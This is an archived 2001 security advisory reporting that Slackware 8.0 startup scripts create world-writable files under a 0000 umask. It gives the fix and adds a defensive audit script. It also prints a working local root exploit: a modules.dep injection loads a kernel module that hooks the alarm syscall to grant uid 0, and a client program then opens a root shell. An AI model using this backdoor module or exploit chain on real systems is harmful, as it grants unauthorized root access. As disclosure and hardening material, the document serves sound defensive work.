
slackware.init.txt

Reported by Josh, 18 Jul 2001. Source: packetstorm (packetstormsecurity.com).

Slackware 8.0 startup scripts run with the umask of 0000 left by the kernel and therefore create world-writable files, among them /var/run/utmp, /var/run/gpm.pid and /lib/modules/`uname -r`/modules.dep. Fix: put `umask 022` at the top of the startup scripts.

I posted this to the linux kernel mailing list last Friday, July 13th 2001:
  
Submitted by : Josh ([email protected]), lockdown  
([email protected]) on July 16th, 2001  
Vulnerability : /lib/modules/2.4.5/modules.dep  
Tested On : Slackware 8.0. 2.4.5  
Local : Yes  
Remote : No  
Temporary Fix : umask 022 at the top of all your startup scripts  
Target : root  
Big thanks to : slider, lamagra, zen-parse  
Greets to : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,  
cryptix, s0ttle, xphantom, qtip, tirancy, Loki,  
falcon-networks.com.  
  
The 2.4.x kernels starting with 2.4.3 (I think) have, after load, left a umask of 0000. This forces any files created in the bootup scripts, without the command `umask 022` issued, to be world writeable. In slackware, files include /var/run/utmp and /var/run/gpm.pid. This same vulnerability is responsible for creating /lib/modules/`uname -r`/modules.dep world writeable. With this file world writeable, all an intruder need do is put something like the following in /lib/modules/`uname -r`/modules.dep, assuming the system's startup scripts modprobe lp:

```
/lib/modules/2.4.5/kernel/drivers/char/lp.o: /tmp/alarm.o

/tmp/alarm.o:
```
  
where the alarm.o module is:

```c
#include <linux/config.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/types.h>
#include <asm/segment.h>
#include <asm/unistd.h>
#include <linux/dirent.h>
#include <sys/syscall.h>
#include <sys/sysmacros.h>

#include <linux/sched.h>

#include <linux/errno.h>
#include <linux/fs.h>
#include <linux/kernel.h>

extern void* sys_call_table[];

/* saved pointer to the original sys_alarm handler */
unsigned int (*old_alarm) (unsigned int seconds);
unsigned int hacked_alarm (unsigned int seconds);

unsigned int hacked_alarm(unsigned int seconds)
{
    /* the magic argument 454 switches the calling process to uid/gid 0 */
    if(seconds == 454) {
        current->uid = 0;
        current->euid = 0;
        current->gid = 0;
        current->egid = 0;
        return 0;
    }
    /* any other argument behaves like the normal alarm(2) */
    return old_alarm(seconds);
}

int init_module(void) {
    /* swap the alarm entry of the syscall table, keeping the original */
    old_alarm = sys_call_table[SYS_alarm];
    sys_call_table[SYS_alarm] = hacked_alarm;
    return 0;
}

void cleanup_module(void) {
    /* restore the original entry on unload */
    sys_call_table[SYS_alarm] = old_alarm;
}
```
  
make a client:

```c
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    alarm(454);
    execl("/bin/sh", "sh", NULL);
    return 0; /* only reached if execl fails */
}
```
  
which will, when the module is loaded, execute a shell as root.

And of course with /var/run/utmp writeable, users can delete or in other ways manipulate their logins as they appear in w/who/finger/getlogin(), etc.
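As an added, defender-side example (not part of the advisory or of Slackware's own scripts): a POSIX shell script that shows why the advisory's `umask 022` fix works and how to audit for the bug's result. It creates files the way a startup script does (by redirection), once under the inherited umask 0000 and once after `umask 022`, then lists world-writable regular files below a directory. The scratch directory and the file names `utmp`, `modules.dep` and `gpm.pid` inside it are constructed stand-ins for /var/run and /lib/modules, not the real system paths.

```shell
#!/bin/sh
# Added example, not part of the original advisory. Works on a constructed
# scratch directory instead of the real /var/run or /lib/modules.

# create_with_umask UMASK PATH: create PATH the way a boot script would
# (a plain redirection), under UMASK, without touching the caller's umask.
create_with_umask() {
    ( umask "$1"; : > "$2" )
}

# is_world_writable PATH: succeed if the "other" write bit is set.
# Column 9 of the mode string printed by ls -ld is that bit ('w' or '-').
is_world_writable() {
    [ "$(ls -ld "$1" | cut -c9)" = "w" ]
}

# world_writable_files DIR: print every regular file below DIR that any
# user may write to, sorted, one per line. Empty output means clean.
world_writable_files() {
    find "$1" -type f -perm -002 -print | sort
}

# demo: reproduce the advisory's condition in a scratch tree and audit it.
demo() {
    root=$(mktemp -d)
    mkdir "$root/run" "$root/modules"
    # unfixed boot script: inherits the kernel's umask 0000 -> mode 666
    create_with_umask 0000 "$root/run/utmp"
    create_with_umask 0000 "$root/modules/modules.dep"
    # fixed boot script: "umask 022" at the top, as the advisory recommends -> mode 644
    create_with_umask 022 "$root/run/gpm.pid"
    echo "world-writable files under $root:"
    world_writable_files "$root"
    rm -rf "$root"
}

demo
```

Running the script prints only the two files created under umask 0000; `gpm.pid`, created after `umask 022`, is absent from the audit. The same `find` line, pointed at /var/run and /lib/modules, is the check to run after boot to confirm the fix took effect.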
